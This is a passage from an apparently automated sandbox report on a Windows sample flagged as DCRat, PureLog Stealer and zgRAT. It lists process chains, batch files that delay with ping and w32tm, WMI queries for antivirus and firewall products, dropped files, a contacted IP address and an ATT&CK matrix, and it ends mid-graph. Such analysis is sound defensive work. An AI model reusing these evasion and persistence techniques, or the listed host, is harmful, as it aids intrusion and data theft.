                            Source: w32tm.exe, 00000006.00000002.1409957928.0000023A9CB99000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1464472681.000000001B6D0000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1616486179.000000001BBFE000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000013.00000002.1644878978.000001A7B5519000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1677912049.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1863112684.000000001BC04000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000001F.00000002.1893090388.00000289C1B79000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002D.00000002.2120698046.000001A627FA9000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2223790602.000000001BEE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC82167B rdtsc 34_2_00007FFAAC82167B
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\iHmrx8Dkeu.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe" Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeQueries volume information: C:\Users\user\Desktop\KPFv8ATDx0.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1465705448.000000001B7A1000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1464472681.000000001B78A000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1725545102.000000001B07D000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BC78000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB47000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B148000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B21D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: KPFv8ATDx0.exe PID: 7272, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: KPFv8ATDx0.exe PID: 7272, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts141
                            Windows Management Instrumentation                            		1
                            Scripting                            		11
                            Process Injection                            		133
                            Masquerading                            		OS Credential Dumping251
                            Security Software Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault AccountsScheduled Task/Job1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Disable or Modify Tools                            		LSASS Memory1
                            Process Discovery                            		Remote Desktop ProtocolData from Removable Media2
                            Ingress Tool Transfer                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                            Virtualization/Sandbox Evasion                            		Security Account Manager151
                            Virtualization/Sandbox Evasion                            		SMB/Windows Admin SharesData from Network Shared Drive2
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                            Process Injection                            		NTDS1
                            Remote System Discovery                            		Distributed Component Object ModelInput Capture12
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Deobfuscate/Decode Files or Information                            		LSA Secrets1
                            System Network Configuration Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                            Obfuscated Files or Information                            		Cached Domain Credentials2
                            File and Directory Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Software Packing                            		DCSync34
                            System Information Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            DLL Side-Loading                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1558732 Sample: KPFv8ATDx0.exe Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 113 Suricata IDS alerts for network traffic 2->113 115 Found malware configuration 2->115 117 Antivirus detection for dropped file 2->117 119 10 other signatures 2->119 14 KPFv8ATDx0.exe 4 33 2->14         started        process3 file4 93 C:\Windows\...\oqWNZWQNWoNnROlqjKcKhLM.exe, PE32 14->93 dropped 95 C:\Users\user\Desktop\zZntUmUz.log, PE32 14->95 dropped 97 C:\Users\user\Desktop\sbztrXaK.log, PE32 14->97 dropped 99 18 other malicious files 14->99 dropped 129 Drops executable to a common third party application directory 14->129 18 cmd.exe 1 14->18         started        signatures5 process6 signatures7 121 Uses ping.exe to sleep 18->121 123 Uses ping.exe to check the status of other devices and networks 18->123 21 oqWNZWQNWoNnROlqjKcKhLM.exe 14 18 18->21         started        26 w32tm.exe 1 18->26         started        28 conhost.exe 18->28         started        30 chcp.com 1 18->30         started        process8 dnsIp9 109 38.180.228.120, 49742, 49822, 49882 COGENT-174US United States 21->109 77 C:\Users\user\Desktop\xMZKLDLb.log, PE32 21->77 dropped 79 C:\Users\user\Desktop\udSmiqlo.log, PE32 21->79 dropped 81 C:\Users\user\Desktop\olpMFKgz.log, PE32 21->81 dropped 83 10 other malicious files 21->83 dropped 125 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->125 32 cmd.exe 1 21->32         started        file10 signatures11 process12 signatures13 111 Uses ping.exe to sleep 32->111 35 oqWNZWQNWoNnROlqjKcKhLM.exe 17 32->35         started        38 conhost.exe 32->38         started        40 PING.EXE 1 32->40         started        42 chcp.com 1 32->42         started        process14 file15 69 C:\Users\user\Desktop\zlxdWeyz.log, PE32 35->69 dropped 71 C:\Users\user\Desktop\zdNKrvXu.log, PE32 35->71 dropped 73 C:\Users\user\Desktop\qDdNmCtS.log, PE32 35->73 dropped 75 10 other malicious files 35->75 dropped 44 cmd.exe 35->44         started        process16 process17 46 oqWNZWQNWoNnROlqjKcKhLM.exe 44->46         started        49 conhost.exe 44->49         started        51 chcp.com 44->51         started        53 w32tm.exe 44->53         started        file18 101 C:\Users\user\Desktop\xhGuwiIZ.log, PE32 46->101 dropped 103 C:\Users\user\Desktop\vfTLbyDe.log, PE32 46->103 dropped 105 C:\Users\user\Desktop\mBLWrFnw.log, PE32 46->105 dropped 107 10 other malicious files 46->107 dropped 55 cmd.exe 46->55         started        process19 signatures20 127 Uses ping.exe to sleep 55->127 58 oqWNZWQNWoNnROlqjKcKhLM.exe 55->58         started        61 conhost.exe 55->61         started        63 chcp.com 55->63         started        65 PING.EXE 55->65         started        process21 file22 85 C:\Users\user\Desktop\sSNMOgTF.log, PE32 58->85 dropped 87 C:\Users\user\Desktop\phiwHSJM.log, PE32 58->87 dropped 89 